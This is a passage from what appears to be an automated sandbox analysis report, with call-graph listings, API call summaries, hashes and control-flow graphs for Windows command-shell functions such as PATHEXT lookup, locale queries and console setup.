18963 7ff706ec3448 166 API calls 18962->18963 18966 7ff706edd5a5 18963->18966 18964 7ff706edd5c4 18968 7ff706ec3448 166 API calls 18964->18968 18969 7ff706edd5ba 18966->18969 18971 7ff706ec3448 166 API calls 18966->18971 18967 7ff706edd541 18967->18962 18970 7ff706edd546 18967->18970 18968->18960 19021 7ff706edd36c 18969->19021 18970->18964 18970->18972 18971->18969 19028 7ff706edd31c 18972->19028 18974->18960 18974->18961 18974->18962 18974->18964 18974->18967 18974->18972 18975 7ff706edd3fc 166 API calls 18974->18975 18976 7ff706ec3448 166 API calls 18974->18976 18975->18974 18976->18974 18978 7ff706ebef71 18977->18978 18979 7ff706ecd1f3 18978->18979 18980 7ff706ebf130 18978->18980 18986 7ff706ebef87 18978->18986 18979->18923 18981 7ff706ec3448 166 API calls 18980->18981 19007 7ff706ebf10e 18980->19007 19019 7ff706ebf046 18981->19019 18982 7ff706ebf433 18984 7ff706ebf8c0 456 API calls 18982->18984 18983 7ff706ebf438 18988 7ff706ebf860 456 API calls 18983->18988 18983->19019 18984->18983 18985 7ff706ebeff2 iswspace 18985->18986 18987 7ff706ebf01f wcschr 18985->18987 18986->18979 18986->18982 18986->18983 18986->18985 18986->18987 18986->19019 18987->19019 18988->19019 18989 7ff706ebf558 iswspace 18992 7ff706ebf6cd wcschr 18989->18992 18989->19019 18990 7ff706ebf0c4 iswdigit 18991 7ff706ebf5aa 18990->18991 18999 7ff706ebf0ea 18990->18999 18994 7ff706ebf860 456 API calls 18991->18994 18992->19019 18993 7ff706ebf471 18995 7ff706ebf860 456 API calls 18993->18995 19005 7ff706ebf4af 18994->19005 18995->18999 18996 7ff706ebf1b7 iswspace 18996->18990 18998 7ff706ebf1ce wcschr 18996->18998 18997 7ff706ebf1fc iswdigit 18997->19019 18998->18990 18998->18997 19000 7ff706ebf860 456 API calls 18999->19000 18999->19007 19003 7ff706ebf4a6 19000->19003 19001 7ff706ebf8c0 456 API calls 19001->19019 19002 7ff706ebf370 19004 7ff706eb3278 166 API calls 19002->19004 19002->19007 19003->19005 19008 7ff706ebf860 456 API calls 19003->19008 19004->18979 19006 7ff706ebf860 456 API calls 19005->19006 19005->19007 19009 7ff706ebf632 iswspace 19006->19009 19007->18923 19008->19005 19009->19005 19010 7ff706ebf648 wcschr 19009->19010 19010->19005 19012 7ff706ebf65f iswdigit 19010->19012 19011 7ff706ebf32f iswspace 19011->19002 19014 7ff706ebf342 wcschr 19011->19014 19012->19007 19015 7ff706ebf67b 19012->19015 19013 7ff706ebf2b8 iswdigit 19013->19019 19014->19002 19014->19013 19016 7ff706ebf860 456 API calls 19015->19016 19016->19007 19017 7ff706ebf3d2 iswspace 19018 7ff706ebf3e9 wcschr 19017->19018 19017->19019 19018->19019 19019->18989 19019->18990 19019->18991 19019->18993 19019->18996 19019->18997 19019->18999 19019->19001 19019->19002 19019->19011 19019->19013 19019->19017 19020 7ff706ebf860 456 API calls 19019->19020 19020->19019 19022 7ff706edd381 19021->19022 19023 7ff706edd3d8 19021->19023 19024 7ff706ec34a0 166 API calls 19022->19024 19027 7ff706edd390 19024->19027 19025 7ff706ec3448 166 API calls 19025->19027 19026 7ff706ec34a0 166 API calls 19026->19027 19027->19023 19027->19025 19027->19026 19027->19027 19029 7ff706ec3448 166 API calls 19028->19029 19030 7ff706edd33b 19029->19030 19031 7ff706edd36c 166 API calls 19030->19031 19032 7ff706edd343 19031->19032 19033 7ff706edd3fc 166 API calls 19032->19033 19050 7ff706edd34e 19033->19050 19034 7ff706edd5c2 19034->18960 19035 7ff706edd576 19036 7ff706edd592 19035->19036 19047 7ff706edd555 19035->19047 19037 7ff706ec3448 166 API calls 19036->19037 19040 7ff706edd5a5 19037->19040 19038 7ff706edd5c4 19042 7ff706ec3448 166 API calls 19038->19042 19039 7ff706edd31c 166 API calls 19039->19034 19043 7ff706edd5ba 19040->19043 19046 7ff706ec3448 166 API calls 19040->19046 19041 7ff706edd541 19041->19036 19044 7ff706edd546 19041->19044 19042->19034 19048 7ff706edd36c 166 API calls 19043->19048 19044->19038 19044->19047 19045 7ff706ec3448 166 API calls 19045->19050 19046->19043 19047->19039 19048->19034 19049 7ff706edd3fc 166 API calls 19049->19050 19050->19034 19050->19035 19050->19036 19050->19038 19050->19041 19050->19045 19050->19047 19050->19049 19053 7ff706ed773c 19051->19053 19052 7ff706ed777d 19052->18892 19053->19052 19054 7ff706ec3448 166 API calls 19053->19054 19054->19053 19056 7ff706ed778c 166 API calls 19055->19056 19057 7ff706ed76fb 19056->19057 19058 7ff706ed771c 19057->19058 19059 7ff706ec3448 166 API calls 19057->19059 19058->18892 19060 7ff706ed7711 19059->19060 19061 7ff706ed778c 166 API calls 19060->19061 19061->19058 19063 7ff706ebc486 19062->19063 19064 7ff706ebc4c9 19062->19064 19065 7ff706ebc48e wcschr 19063->19065 19069 7ff706ebc161 19063->19069 19067 7ff706ebff70 2 API calls 19064->19067 19064->19069 19066 7ff706ebc4ef 19065->19066 19065->19069 19068 7ff706ebcd90 166 API calls 19066->19068 19067->19069 19075 7ff706ebc4f9 19068->19075 19069->18432 19069->18456 19070 7ff706ebc5bd 19071 7ff706ebc541 19070->19071 19074 7ff706ebb6b0 170 API calls 19070->19074 19071->19069 19073 7ff706ebff70 2 API calls 19071->19073 19072 7ff706ebd840 178 API calls 19072->19075 19073->19069 19074->19071 19075->19069 19075->19070 19075->19071 19075->19072 19077 7ff706ebb018 19076->19077 19077->18493 19078->18493 19080 7ff706ec3bfe 19079->19080 19082 7ff706ec3bcf 19079->19082 19080->18544 19081 7ff706ec3bdc wcschr 19081->19080 19081->19082 19082->19080 19082->19081 19084 7ff706ec8f80 7 API calls 19083->19084 19085 7ff706ec296b 19084->19085 19085->18544 19087 7ff706ec2f2a 19086->19087 19088 7ff706ec2f97 19086->19088 19090 7ff706ec823c 10 API calls 19087->19090 19088->19087 19089 7ff706ec2f9c wcschr 19088->19089 19091 7ff706ec2fb6 wcschr 19089->19091 19098 7ff706ec2f5a 19089->19098 19092 7ff706ec2f56 19090->19092 19091->19087 19091->19098 19093 7ff706ec3a0c 2 API calls 19092->19093 19092->19098 19095 7ff706ec2fe0 19093->19095 19094 7ff706ec8f80 7 API calls 19096 7ff706ec2f83 19094->19096 19097 7ff706ec2fe9 wcsrchr 19095->19097 19095->19098 19096->18544 19097->19098 19098->19094 19099 7ff706ece4ec 19098->19099 19101 7ff706ed4621 19100->19101 19102 7ff706eb72de 19100->19102 19104 7ff706ed47e0 19101->19104 19105 7ff706ed447b longjmp 19101->19105 19108 7ff706ed4639 19101->19108 19117 7ff706ed475e 19101->19117 19103 7ff706eb72eb 19102->19103 19111 7ff706ed4530 19102->19111 19112 7ff706ed4467 19102->19112 19161 7ff706eb7348 19103->19161 19107 7ff706eb7348 168 API calls 19104->19107 19109 7ff706ed4492 19105->19109 19160 7ff706ed4524 19107->19160 19113 7ff706ed4695 19108->19113 19114 7ff706ed463e 19108->19114 19115 7ff706eb7348 168 API calls 19109->19115 19116 7ff706eb7348 168 API calls 19111->19116 19112->19103 19112->19109 19119 7ff706ed4475 19112->19119 19124 7ff706eb73d4 168 API calls 19113->19124 19114->19105 19125 7ff706ed4654 19114->19125 19132 7ff706ed44a8 19115->19132 19127 7ff706ed4549 19116->19127 19120 7ff706eb7348 168 API calls 19117->19120 19118 7ff706eb7315 19176 7ff706eb73d4 19118->19176 19119->19105 19119->19113 19120->19104 19121 7ff706eb7348 168 API calls 19121->19118 19122 7ff706eb72b0 168 API calls 19128 7ff706ed480e 19122->19128 19141 7ff706ed469a 19124->19141 19133 7ff706eb7348 168 API calls 19125->19133 19126 7ff706ed45b2 19129 7ff706eb7348 168 API calls 19126->19129 19127->19126 19148 7ff706eb7348 168 API calls 19127->19148 19149 7ff706ed455e 19127->19149 19128->18586 19131 7ff706ed45c7 19129->19131 19130 7ff706eb72b0 168 API calls 19138 7ff706ed4738 19130->19138 19135 7ff706eb7348 168 API calls 19131->19135 19136 7ff706eb7348 168 API calls 19132->19136 19144 7ff706ed44e2 19132->19144 19139 7ff706eb7323 19133->19139 19134 7ff706eb7348 168 API calls 19134->19126 19143 7ff706ed45db 19135->19143 19136->19144 19137 7ff706eb72b0 168 API calls 19145 7ff706ed44f1 19137->19145 19142 7ff706eb7348 168 API calls 19138->19142 19139->18586 19140 7ff706ed46e1 19140->19130 19141->19140 19150 7ff706ed46c7 19141->19150 19151 7ff706ed46ea 19141->19151 19142->19160 19146 7ff706eb7348 168 API calls 19143->19146 19144->19137 19147 7ff706eb72b0 168 API calls 19145->19147 19152 7ff706ed45ec 19146->19152 19153 7ff706ed4503 19147->19153 19148->19149 19149->19126 19149->19134 19150->19140 19157 7ff706eb7348 168 API calls 19150->19157 19154 7ff706eb7348 168 API calls 19151->19154 19155 7ff706eb7348 168 API calls 19152->19155 19153->19139 19156 7ff706eb7348 168 API calls 19153->19156 19154->19140 19158 7ff706ed4600 19155->19158 19156->19160 19157->19140 19159 7ff706eb7348 168 API calls 19158->19159 19159->19160 19160->19122 19160->19139 19163 7ff706eb735d 19161->19163 19162 7ff706eb3278 166 API calls 19164 7ff706ed4820 longjmp 19162->19164 19163->19162 19163->19163 19165 7ff706ed4838 19163->19165 19175 7ff706eb73ab 19163->19175 19164->19165 19166 7ff706eb3278 166 API calls 19165->19166 19167 7ff706ed4844 longjmp 19166->19167 19168 7ff706ed485a 19167->19168 19169 7ff706eb7348 166 API calls 19168->19169 19170 7ff706ed487b 19169->19170 19171 7ff706eb7348 166 API calls 19170->19171 19172 7ff706ed48ad 19171->19172 19173 7ff706eb7348 166 API calls 19172->19173 19174 7ff706eb72ff 19173->19174 19174->19118 19174->19121 19177 7ff706eb7401 19176->19177 19178 7ff706ed485a 19176->19178 19177->19139 19179 7ff706eb7348 168 API calls 19178->19179 19180 7ff706ed487b 19179->19180 19181 7ff706eb7348 168 API calls 19180->19181 19182 7ff706ed48ad 19181->19182 19183 7ff706eb7348 168 API calls 19182->19183 19184 7ff706ed48be 19183->19184 19184->19139 16773 7ff706ec8d80 16774 7ff706ec8da4 16773->16774 16775 7ff706ec8db6 16774->16775 16776 7ff706ec8dbf Sleep 16774->16776 16777 7ff706ec8ddb _amsg_exit 16775->16777 16783 7ff706ec8de7 16775->16783 16776->16774 16777->16783 16778 7ff706ec8e56 _initterm 16780 7ff706ec8e73 _IsNonwritableInCurrentImage 16778->16780 16779 7ff706ec8e3c 16787 7ff706ec37d8 GetCurrentThreadId OpenThread 16780->16787 16783->16778 16783->16779 16783->16780 16820 7ff706ec04f4 16787->16820 16789 7ff706ec3839 HeapSetInformation RegOpenKeyExW 16790 7ff706ece9f8 RegQueryValueExW RegCloseKey 16789->16790 16791 7ff706ec388d 16789->16791 16793 7ff706ecea41 GetThreadLocale 16790->16793 16792 7ff706ec5920 VirtualQuery VirtualQuery 16791->16792 16794 7ff706ec38ab GetConsoleOutputCP GetCPInfo 16792->16794 16807 7ff706ec3919 16793->16807 16794->16793 16795 7ff706ec38f1 memset 16794->16795 16795->16807 16796 7ff706ec4d5c 391 API calls 16796->16807 16797 7ff706ec3948 _setjmp 16797->16807 16798 7ff706eceb27 _setjmp 16798->16807 16799 7ff706ec4c1c 166 API calls 16799->16807 16800 7ff706ed8530 370 API calls 16800->16807 16801 7ff706eb3240 166 API calls 16801->16807 16802 7ff706ec01b8 6 API calls 16802->16807 16803 7ff706ebdf60 481 API calls 16803->16807 16804 7ff706eceb71 _setmode 16804->16807 16805 7ff706ec86f0 182 API calls 16805->16807 16806 7ff706ec0580 12 API calls 16808 7ff706ec398b GetConsoleOutputCP GetCPInfo 16806->16808 16807->16790 16807->16796 16807->16797 16807->16798 16807->16799 16807->16800 16807->16801 16807->16802 16807->16803 16807->16804 16807->16805 16807->16806 16809 7ff706ec58e4 EnterCriticalSection LeaveCriticalSection 16807->16809 16811 7ff706ebbe00 647 API calls 16807->16811 16812 7ff706ec58e4 EnterCriticalSection LeaveCriticalSection 16807->16812 16810 7ff706ec04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16808->16810 16809->16807 16810->16807 16811->16807 16813 7ff706ecebbe GetConsoleOutputCP GetCPInfo 16812->16813 16814 7ff706ec04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16813->16814 16815 7ff706ecebe6 16814->16815 16816 7ff706ebbe00 647 API calls 16815->16816 16817 7ff706ec0580 12 API calls 16815->16817 16816->16815 16818 7ff706ecebfc GetConsoleOutputCP GetCPInfo 16817->16818 16819 7ff706ec04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16818->16819 16819->16807 16821 7ff706ec0504 16820->16821 16822 7ff706ec051e GetModuleHandleW 16821->16822 16823 7ff706ec054d GetProcAddress 16821->16823 16824 7ff706ec056c SetThreadLocale 16821->16824 16822->16821 16823->16821

                                                                                                                                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC0A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3305344409-4288247545
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9bfec8900945ec7118506fc4e3bb8b18e404af2f69f167a43fa234661bd7550b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14429125A0878285EB64AB219C342BBE7A1FF85BA4FC44234DD1E4B7D5DF3DE5468320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBAA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 216 7ff706ebaa54-7ff706ebaa98 call 7ff706ebcd90 219 7ff706ebaa9e 216->219 220 7ff706ecbf5a-7ff706ecbf70 call 7ff706ec4c1c call 7ff706ebff70 216->220 221 7ff706ebaaa5-7ff706ebaaa8 219->221 223 7ff706ebacde-7ff706ebad00 221->223 224 7ff706ebaaae-7ff706ebaac8 wcschr 221->224 230 7ff706ebad06 223->230 224->223 226 7ff706ebaace-7ff706ebaae9 towlower 224->226 226->223 229 7ff706ebaaef-7ff706ebaaf3 226->229 232 7ff706ebaaf9-7ff706ebaafd 229->232 233 7ff706ecbeb7-7ff706ecbec4 call 7ff706edeaf0 229->233 234 7ff706ebad0d-7ff706ebad1f 230->234 235 7ff706ecbbcf 232->235 236 7ff706ebab03-7ff706ebab07 232->236 243 7ff706ecbf43-7ff706ecbf59 call 7ff706ec4c1c 233->243 244 7ff706ecbec6-7ff706ecbed8 call 7ff706eb3240 233->244 237 7ff706ebad22-7ff706ebad2a call 7ff706ec13e0 234->237 245 7ff706ecbbde 235->245 239 7ff706ebab09-7ff706ebab0d 236->239 240 7ff706ebab7d-7ff706ebab81 236->240 237->221 246 7ff706ecbe63 239->246 248 7ff706ebab13-7ff706ebab17 239->248 240->246 247 7ff706ebab87-7ff706ebab95 240->247 243->220 244->243 261 7ff706ecbeda-7ff706ecbee9 call 7ff706eb3240 244->261 256 7ff706ecbbea-7ff706ecbbec 245->256 259 7ff706ecbe72-7ff706ecbe88 call 7ff706eb3278 call 7ff706ec4c1c 246->259 252 7ff706ebab98-7ff706ebaba0 247->252 248->240 253 7ff706ebab19-7ff706ebab1d 248->253 252->252 257 7ff706ebaba2-7ff706ebabb3 call 7ff706ebcd90 252->257 253->245 258 7ff706ebab23-7ff706ebab27 253->258 266 7ff706ecbbf8-7ff706ecbc01 256->266 257->220 272 7ff706ebabb9-7ff706ebabde call 7ff706ec13e0 call 7ff706ec33a8 257->272 258->256 263 7ff706ebab2d-7ff706ebab31 258->263 281 7ff706ecbe89-7ff706ecbe8c 259->281 276 7ff706ecbef3-7ff706ecbef9 261->276 277 7ff706ecbeeb-7ff706ecbef1 261->277 263->230 268 7ff706ebab37-7ff706ebab3b 263->268 266->234 268->266 269 7ff706ebab41-7ff706ebab45 268->269 273 7ff706ecbc06-7ff706ecbc2a call 7ff706ec13e0 269->273 274 7ff706ebab4b-7ff706ebab4f 269->274 305 7ff706ebac75 272->305 306 7ff706ebabe4-7ff706ebabe7 272->306 298 7ff706ecbc2c-7ff706ecbc4c _wcsnicmp 273->298 299 7ff706ecbc5a-7ff706ecbc61 273->299 279 7ff706ebad2f-7ff706ebad33 274->279 280 7ff706ebab55-7ff706ebab78 call 7ff706ec13e0 274->280 276->243 282 7ff706ecbefb-7ff706ecbf0d call 7ff706eb3240 276->282 277->243 277->276 290 7ff706ecbc66-7ff706ecbc8a call 7ff706ec13e0 279->290 291 7ff706ebad39-7ff706ebad3d 279->291 280->221 286 7ff706ecbe92-7ff706ecbeaa call 7ff706eb3278 call 7ff706ec4c1c 281->286 287 7ff706ebacbe 281->287 282->243 312 7ff706ecbf0f-7ff706ecbf21 call 7ff706eb3240 282->312 340 7ff706ecbeab-7ff706ecbeb6 call 7ff706ec4c1c 286->340 295 7ff706ebacc0-7ff706ebacc7 287->295 319 7ff706ecbcc4-7ff706ecbcdc 290->319 320 7ff706ecbc8c-7ff706ecbcaa _wcsnicmp 290->320 300 7ff706ebad43-7ff706ebad49 291->300 301 7ff706ecbcde-7ff706ecbd02 call 7ff706ec13e0 291->301 295->295 309 7ff706ebacc9-7ff706ebacda 295->309 298->299 313 7ff706ecbc4e-7ff706ecbc55 298->313 307 7ff706ecbd31-7ff706ecbd4f _wcsnicmp 299->307 303 7ff706ebad4f-7ff706ebad68 300->303 304 7ff706ecbd5e-7ff706ecbd65 300->304 329 7ff706ecbd04-7ff706ecbd24 _wcsnicmp 301->329 330 7ff706ecbd2a 301->330 316 7ff706ebad6a 303->316 317 7ff706ebad6d-7ff706ebad70 303->317 304->303 314 7ff706ecbd6b-7ff706ecbd73 304->314 323 7ff706ebac77-7ff706ebac7f 305->323 306->287 318 7ff706ebabed-7ff706ebac0b call 7ff706ebcd90 * 2 306->318 325 7ff706ecbd55 307->325 326 7ff706ecbbc2-7ff706ecbbca 307->326 309->223 312->243 343 7ff706ecbf23-7ff706ecbf35 call 7ff706eb3240 312->343 315 7ff706ecbbb3-7ff706ecbbb7 313->315 331 7ff706ecbd79-7ff706ecbd8b iswxdigit 314->331 332 7ff706ecbe4a-7ff706ecbe5e 314->332 333 7ff706ecbbba-7ff706ecbbbd call 7ff706ec13e0 315->333 316->317 317->237 318->340 358 7ff706ebac11-7ff706ebac14 318->358 319->307 320->319 327 7ff706ecbcac-7ff706ecbcbf 320->327 323->287 335 7ff706ebac81-7ff706ebac85 323->335 325->304 326->221 327->315 329->330 341 7ff706ecbbac 329->341 330->307 331->332 337 7ff706ecbd91-7ff706ecbda3 iswxdigit 331->337 332->333 333->326 342 7ff706ebac88-7ff706ebac8f 335->342 337->332 345 7ff706ecbda9-7ff706ecbdbb iswxdigit 337->345 340->233 341->315 342->342 347 7ff706ebac91-7ff706ebac94 342->347 343->243 355 7ff706ecbf37-7ff706ecbf3e call 7ff706eb3240 343->355 345->332 351 7ff706ecbdc1-7ff706ecbdd7 iswdigit 345->351 347->287 349 7ff706ebac96-7ff706ebacaa wcsrchr 347->349 349->287 354 7ff706ebacac-7ff706ebacb9 call 7ff706ec1300 349->354 356 7ff706ecbddf-7ff706ecbdeb towlower 351->356 357 7ff706ecbdd9-7ff706ecbddd 351->357 354->287 355->243 361 7ff706ecbdee-7ff706ecbe0f iswdigit 356->361 357->361 358->340 362 7ff706ebac1a-7ff706ebac33 memset 358->362 363 7ff706ecbe11-7ff706ecbe15 361->363 364 7ff706ecbe17-7ff706ecbe23 towlower 361->364 362->305 365 7ff706ebac35-7ff706ebac4b wcschr 362->365 366 7ff706ecbe26-7ff706ecbe45 call 7ff706ec13e0 363->366 364->366 365->305 367 7ff706ebac4d-7ff706ebac54 365->367 366->332 368 7ff706ebad72-7ff706ebad91 wcschr 367->368 369 7ff706ebac5a-7ff706ebac6f wcschr 367->369 371 7ff706ebaf03-7ff706ebaf07 368->371 372 7ff706ebad97-7ff706ebadac wcschr 368->372 369->305 369->368 371->305 372->371 373 7ff706ebadb2-7ff706ebadc7 wcschr 372->373 373->371 374 7ff706ebadcd-7ff706ebade2 wcschr 373->374 374->371 375 7ff706ebade8-7ff706ebadfd wcschr 374->375 375->371 376 7ff706ebae03-7ff706ebae18 wcschr 375->376 376->371 377 7ff706ebae1e-7ff706ebae21 376->377 378 7ff706ebae24-7ff706ebae27 377->378 378->371 379 7ff706ebae2d-7ff706ebae40 iswspace 378->379 380 7ff706ebae42-7ff706ebae49 379->380 381 7ff706ebae4b-7ff706ebae5e 379->381 380->378 382 7ff706ebae66-7ff706ebae6d 381->382 382->382 383 7ff706ebae6f-7ff706ebae77 382->383 383->259 384 7ff706ebae7d-7ff706ebae97 call 7ff706ec13e0 383->384 387 7ff706ebae9a-7ff706ebaea4 384->387 388 7ff706ebaea6-7ff706ebaead 387->388 389 7ff706ebaebc-7ff706ebaef8 call 7ff706ec0a6c call 7ff706ebff70 * 2 387->389 388->389 390 7ff706ebaeaf-7ff706ebaeba 388->390 389->323 397 7ff706ebaefe 389->397 390->387 390->389 397->281
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :$:$:$:ON$OFF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 972821348-467788257
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d89b8ef5a57032106b00a460d635cd2fedc4392d70b9e8c128c9239153785143
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9622B225A0874386EB24BF259C352BBE691FF55B94FC89135CA0E4B398DF3CA8458770
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC51EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 398 7ff706ec51ec-7ff706ec5248 call 7ff706ec5508 GetLocaleInfoW 401 7ff706ecef32-7ff706ecef3c 398->401 402 7ff706ec524e-7ff706ec5272 GetLocaleInfoW 398->402 405 7ff706ecef3f-7ff706ecef49 401->405 403 7ff706ec5295-7ff706ec52b9 GetLocaleInfoW 402->403 404 7ff706ec5274-7ff706ec527a 402->404 410 7ff706ec52de-7ff706ec5305 GetLocaleInfoW 403->410 411 7ff706ec52bb-7ff706ec52c3 403->411 408 7ff706ec5280-7ff706ec5286 404->408 409 7ff706ec54f7-7ff706ec54f9 404->409 406 7ff706ecef61-7ff706ecef6c 405->406 407 7ff706ecef4b-7ff706ecef52 405->407 414 7ff706ecef75-7ff706ecef78 406->414 407->406 412 7ff706ecef54-7ff706ecef5f 407->412 408->409 413 7ff706ec528c-7ff706ec528f 408->413 409->401 416 7ff706ec5321-7ff706ec5343 GetLocaleInfoW 410->416 417 7ff706ec5307-7ff706ec531b 410->417 411->414 415 7ff706ec52c9-7ff706ec52d7 411->415 412->405 412->406 413->403 420 7ff706ecef99-7ff706ecefa3 414->420 421 7ff706ecef7a-7ff706ecef7d 414->421 415->410 418 7ff706ecefaf-7ff706ecefb9 416->418 419 7ff706ec5349-7ff706ec536e GetLocaleInfoW 416->419 417->416 425 7ff706ecefbc-7ff706ecefc6 418->425 422 7ff706ec5374-7ff706ec5396 GetLocaleInfoW 419->422 423 7ff706eceff2-7ff706eceffc 419->423 420->418 421->410 424 7ff706ecef83-7ff706ecef8d 421->424 427 7ff706ecf035-7ff706ecf03f 422->427 428 7ff706ec539c-7ff706ec53be GetLocaleInfoW 422->428 426 7ff706ecefff-7ff706ecf009 423->426 424->420 429 7ff706ecefde-7ff706ecefe9 425->429 430 7ff706ecefc8-7ff706ecefcf 425->430 431 7ff706ecf021-7ff706ecf02c 426->431 432 7ff706ecf00b-7ff706ecf012 426->432 435 7ff706ecf042-7ff706ecf04c 427->435 433 7ff706ec53c4-7ff706ec53e6 GetLocaleInfoW 428->433 434 7ff706ecf078-7ff706ecf082 428->434 429->423 430->429 436 7ff706ecefd1-7ff706ecefdc 430->436 431->427 432->431 437 7ff706ecf014-7ff706ecf01f 432->437 438 7ff706ecf0bb-7ff706ecf0c5 433->438 439 7ff706ec53ec-7ff706ec540e GetLocaleInfoW 433->439 442 7ff706ecf085-7ff706ecf08f 434->442 440 7ff706ecf064-7ff706ecf06f 435->440 441 7ff706ecf04e-7ff706ecf055 435->441 436->425 436->429 437->426 437->431 443 7ff706ecf0c8-7ff706ecf0d2 438->443 444 7ff706ec5414-7ff706ec5436 GetLocaleInfoW 439->444 445 7ff706ecf0fe-7ff706ecf108 439->445 440->434 441->440 446 7ff706ecf057-7ff706ecf062 441->446 447 7ff706ecf091-7ff706ecf098 442->447 448 7ff706ecf0a7-7ff706ecf0b2 442->448 449 7ff706ecf0d4-7ff706ecf0db 443->449 450 7ff706ecf0ea-7ff706ecf0f5 443->450 451 